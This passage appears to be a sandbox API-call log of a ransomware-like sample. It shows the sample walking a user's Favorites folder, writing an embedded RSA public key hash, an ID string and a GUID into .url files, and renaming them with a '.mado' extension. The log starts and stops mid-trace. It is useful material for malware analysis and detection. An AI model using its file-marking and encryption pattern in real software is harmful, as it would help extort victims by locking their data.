[0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe7f0 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe7d8 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7f0 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe820 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.373] GetCurrentThreadId () returned 0x600 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68e88 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.374] GetCurrentThreadId () returned 0x600 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe820 [0205.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7d8 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7f0 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7c0 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe838 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe808 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe850 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7d8 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe820 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe850 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe808 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe838 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7f0 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7c0 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7a8 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66108 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.378] WriteFile (in: hFile=0x63c, lpBuffer=0x2eee30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x2eee30*, lpNumberOfBytesWritten=0x39cfb14*=0x80, lpOverlapped=0x0) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.378] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.378] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.378] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.379] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.379] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.379] CloseHandle (hObject=0x63c) returned 1 [0205.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.380] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.mado")) returned 1 [0205.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.380] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.381] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0205.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.381] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0205.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.382] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.382] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.384] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.384] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.385] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.385] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.386] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.386] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.386] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.386] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.386] GetLastError () returned 0x0 [0205.386] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.386] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.387] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.387] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.387] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.387] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.387] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.387] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.387] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.387] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.387] CloseHandle (hObject=0x63c) returned 1 [0205.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0205.388] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.mado")) returned 1 [0205.389] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, 